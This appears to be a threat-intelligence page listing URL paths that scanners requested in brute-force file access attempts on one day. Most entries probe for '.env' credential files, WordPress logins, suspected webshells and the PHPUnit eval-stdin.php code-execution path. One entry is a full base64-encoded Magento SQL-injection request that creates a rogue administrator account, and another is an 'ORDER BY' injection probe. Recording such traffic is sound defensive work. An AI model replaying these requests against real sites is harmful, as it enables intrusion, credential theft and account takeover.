File Access Bruteforce Attempts for 2021-04-17

Share on:

Last Updated: 21:04 GMT+8

 • admin/.env
 • admin/api.php?version
 • admin/index.php
 • admin/index.php?route=common/login
 • api/.env
 • app-ads.txt
 • assets/fonts/FiraCode-Regular.woff
 • assets/img/logo-high-resolution.png
 • blog/.env
 • blog/wp-login.php
 • censys-scanner.com
 • downloader/index.php
 • faq/
 • index.php/admin//Cms_Wysiwyg/directive/?forwarded=true&isIframe=true&___directive=e3tibG9jayB0eXBlPSJhZG1pbmh0bWwvcmVwb3J0X3NlYXJjaF9ncmlkIn19&filter=bnVtX3Jlc3VsdHNbZnJvbV09MCZudW1fcmVzdWx0c1tmaWVsZF9leHByXT0xPTIpO0RFTEVURSBGUk9NIGBhZG1pbl91c2VyYCBXSEVSRSB1c2VybmFtZT0nYmxhY2snO0RFTEVURSBGUk9NIGBhZG1pbl9yb2xlYCBXSEVSRSB1c2VyX2lkPTY5Njk7SU5TRVJUIElOVE8gYGFkbWluX3VzZXJgIChgdXNlcl9pZGAsYGZpcnN0bmFtZWAsYGxhc3RuYW1lYCxgZW1haWxgLGB1c2VybmFtZWAsYHBhc3N3b3JkYCxgY3JlYXRlZGAsYG1vZGlmaWVkYCxgbG9nZGF0ZWAsYGxvZ251bWAsYHJlbG9hZF9hY2xfZmxhZ2AsYGlzX2FjdGl2ZWAsYGV4dHJhYCkgVkFMVUVTICg2OTY5LCdtYWdlbnRvJywnZGV2ZWxvcGVyJywnZGV2ZWxvcGVyQG1hZ2VudG9jb21tZXJjZS5jb20nLCdibGFjaycsJzdkMDdhMWRmODExMGZlNTUwYzZhZDJmODhkM2M3ZTk4JywnMjAxNS0wNS0wNSAwNTowNTowNScsJzIwMTUtMDUtMDUgMDU6MDU6MDUnLCcyMDE1LTA1LTA1IDA1OjA1OjA1JywxLDAsMSwnTjsnKTtJTlNFUlQgSU5UTyBgYWRtaW5fcm9sZWAgKGBwYXJlbnRfaWRgLGB0cmVlX2xldmVsYCxgc29ydF9vcmRlcmAsYHJvbGVfdHlwZWAsYHVzZXJfaWRgLGByb2xlX25hbWVgKSBWQUxVRVMgKDEsMiwwLCdVJyw2OTY5LCdkZXZlbG9wZXInKTs7IC0tIA==
 • laravel/.env
 • phishingdomains-2021-03-02/en
 • phishingdomains-2021-03-22/%20ORDER%20BY%2043331–
 • port56533/
 • public/.env
 • sellers.json
 • shop/.env
 • sites/.env
 • status
 • status/format/json
 • status?full&json
 • stub_status
 • system/.env
 • test/.env
 • us
 • vendor/.env
 • vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
 • wordpress/wp-admin/
 • wordpress/wp-login.php
 • wp-admin/
 • wp-content/plugins/apikey/apikey.php
 • wp-content/plugins/apikey/cursed.php
 • wp-content/plugins/downloads-manager/img/unlock.gif
 • wp-content/plugins/ioptimization/IOptimize.php?rchk
 • wp-login.php
 • wp/wp-login.php